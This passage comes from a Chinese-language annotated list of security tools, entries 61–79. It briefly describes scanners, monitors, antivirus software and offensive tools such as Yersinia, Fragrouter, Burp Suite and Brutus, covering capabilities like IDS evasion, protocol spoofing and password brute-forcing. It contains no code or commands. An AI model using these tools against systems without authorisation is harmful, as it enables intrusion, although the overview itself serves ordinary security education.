#61 ISS Internet Scanner:应用程序漏洞扫描器
Internet Scanner是由Christopher Klaus在92年编写的一款开源的扫描器工具。现在这款工具已经演变成了一个市值上亿美元生产无数安全产品的公司。
--------------------------------------------------------------------------------
#62 Fport:Foundstone出品的加强版netstat
Fport可以报告所有本地机上打开的TCP/IP和UDP端口,并显示是何程序打开的端口。所以用它可以快速识别出未知的开放端口以及与其相关的应用程序。它只有Windows版本,但现在很多UNIX系统上的netstat也提供同样的功能(Linux请用'netstat -pan')。SANS article有Fport的使用说明和结果分析方法。
--------------------------------------------------------------------------------
#63 chkrootkit:本地rootkit检测器
chkrootkit是一款小巧易用的Unix平台上的可以检测多种rootkit入侵的工具。它的功能包括检测文件修改、utmp/wtmp/last日志修改、界面欺骗(promiscuous interfaces)、恶意核心模块(malicious kernel modules)。
--------------------------------------------------------------------------------
#64 SPIKE Proxy:HTTP攻击
Spike Proxy是一款开源的以发现网站漏洞为目的的HTTP代理。它是Spike Application Testing Suite的一部分,功能包括自动SQL注入检测、 网站爬行(web site crawling)、登录列表暴力破解、溢出检测和目录游走检测。
--------------------------------------------------------------------------------
#65 OpenBSD:被认为是最安全的操作系统
OpenBSD是将安全作为操作系统首要任务的操作系统之一,甚至有时安全性级别要高于易用性,所以它骄人的安全性是不言而喻的。OpenBSD也非常重视系统的稳定性和对硬件的支持能力。也许他们最伟大的创举就是创造了OpenSSH。 OpenBSD用户对此系统之上的[pf](OpenBSD上的防火墙工具,本列表中第57位有介绍)也褒奖有佳。
--------------------------------------------------------------------------------
#66 Yersinia:一款支持多协议的底层攻击工具
Yersinia是一款底层协议攻击入侵检测工具。它能实施针对多种协议的多种攻击。例如夺取生成树的根角色(生成树协议:Spanning Tree Protocol),生成虚拟CDP(Cisco发现协议:Cisco Discovery Protocol)邻居、在一个HSRP(热等待路由协议:Hot Standby Router Protocol)环境中虚拟成一个活动的路由器、制造假DHCP反馈,以及其它底层攻击。
--------------------------------------------------------------------------------
#67 Nagios:一款开源的主机、服务和网络监控程序
Nagios是一款系统和网络监控程序。它可以监视您指定的主机和服务,当被监视对象发生任何问题或问题被解决时发出提示信息。它的主要功能有监控网络服务(smtp、pop3、http、nntp、ping等等)、监控主机资源(进程负载、硬盘空间使用情况等等)、当发现问题或问题解决时通过多种形式发出提示信息(Email、寻呼机或其它用户定义的方式)。
--------------------------------------------------------------------------------
#68 Fragroute/Fragrouter:一款网络入侵检测逃避工具集
Fragrouter 是一款单向分段路由器,发送(接收)IP数据包都是从攻击者到Fragrouter,将数据包转换成分段数据流发给受害者。很多入侵检测系统都不能重建一段被视为一个整体的网络数据(通过IP分段和TCP流重组),详情请见这篇文章(this classic paper)。Fragrouter可以帮助骇客在逃避入侵检测后发起基于IP的攻击。它是Dug Song出品的NIDSbench套装中的一部分。Fragroute是Dug song出品的另一款和Fragrouter相似的工具。
--------------------------------------------------------------------------------
#69 X-scan:一款网络漏洞扫描器
一款多线程、支持插件的漏洞扫描器。X-Scan主要功能有全面支持NASL(Nessus攻击脚本语言:Nessus Attack Scripting Language)、检测服务类型、远程操作系统类型(版本)检测、弱用户名/密码匹配等等。最新版本可以在这里获取。请注意这是一个中文网站(原文为英文,所以原文作者提醒英文读者这是个中文网站)。
--------------------------------------------------------------------------------
#70 Whisker/libwhisker:Rain.Forest.Puppy出品的CGI漏洞扫描器和漏洞库
Libwhisker是一款Perl模板集用来测试HTTP。它的功能是测试HTTP服务器上是否存在许多已知的安全漏洞,特别是CGI漏洞。Whisker是一款基于libwhisker的扫描器,但是现在大家都趋向于使用Nikto,它也是基于libwhisker的。
--------------------------------------------------------------------------------
#71 Socat:双向数据传输中继
类似于Netcat的工具,可以工作于许多协议之上,运行于文件、管道、设备(终端或调制解调器等等)、socket(Unix、IP4、IP6-raw、UDP、TCP)、Socks4客户端、代理服务器连接、或者SSL等等之间。它提供forking、logging和dumping,和不同模式的交互式处理通讯,以及更多其它选项。它可以作为TCP中继(单次触发:one-shot或者daemon(Internet中用于邮件收发的后台程序))、作为基于daemon的动态Sockes化(socksifier)、作为Unix平台上sockets的shell接口、作为IP6中继、将面向TCP的程序重定向成串行线路(Serial Line)程序、或者建立用来运行客户端或服务器带有网络连接的shell脚本相关安全环境(su和chroot)。
--------------------------------------------------------------------------------
#72 Sara:安全评审研究助手
SARA是一款源于infamous SATAN扫描器的漏洞评估工具。此工具大约两个月更新一次,出品此工具的开源社区还维护着Nmap和Samba。
--------------------------------------------------------------------------------
#73 QualysGuard:基于网页的漏洞扫描器
在网站上以服务形式发布, 所以QualysGuard没有开发、维护和升级漏洞管理软件或ad-hoc安全应用程序的负担。客户端可以安全的通过一个简单易用的网页访问QualysGuard。QualysGuard含有5000种以上的单一漏洞检查,一个基于推理的扫描引擎,而且漏洞知识库自动天天升级。
--------------------------------------------------------------------------------
#74 ClamAV:一款UNIX平台上的基于GPL(通用公开许可证:General Public License)的反病毒工具集
ClamAV是一款强大的注重邮件服务器附件扫描的反病毒扫描器。它含有一个小巧的可升级的多线程daemon、一个命令行扫描器和自动升级工具。Clam AntiVirus基于AntiVirus package发布的开源病毒库,您也可以将此病毒库应用于您自己的软件中,但是别忘了经常升级。
--------------------------------------------------------------------------------
#75 cheops / cheops-ng:提供许多简单的网络工具,例如本地或远程网络映射和识别计算机操作系统
Cheops提供许多好用的图形化用户界面网络工具。它含有主机/网络发现功能,也就是主机操作系统检测。Cheops-ng用来探查主机上运行的服务。针对某些服务,cheops-ng可以探查到运行服务的应用程序是什么,以及程序的版本号。Cheops已经停止开发和维护,所以请最好使用cheops-ng。
--------------------------------------------------------------------------------
#76 Burpsuite:一款网页程序攻击集成平台
Burp suite允许攻击者结合手工和自动技术去枚举、分析、攻击网页程序。这些不同的burp工具通过协同工作,有效的分享信息,支持以某种工具中的信息为基础供另一种工具使用从而发动攻击。
--------------------------------------------------------------------------------
#77 Brutus:一款网络验证暴力破解器
这款Windows平台上的暴力破解器通过字典猜测远程系统网络服务密码。它支持HTTP、POP3、FTP、SMB、TELNET、IMAP、NTP等等。不开放源码,UNIX平台上的类似软件有THC Hydra。
--------------------------------------------------------------------------------
#78 Unicornscan:另类端口扫描器
Unicornscan是一款通过尝试连接用户系统(User-land)分布式TCP/IP堆栈获得信息和关联关系的端口扫描器。它试图为研究人员提供一种可以刺激TCP/IP设备和网络并度量反馈的超级接口。它主要功能包括带有所有TCP变种标记的异步无状态TCP扫描、异步无状态TCP标志捕获、通过分析反馈信息获取主动/被动远程操作系统、应用程序、组件信息。它和Scanrand一样都是另类扫描器。
--------------------------------------------------------------------------------
#79 Stunnel:用途广泛的SSL加密封装器
stunnel用来对远程客户端和本地机(可启动inetd的:inetd-s
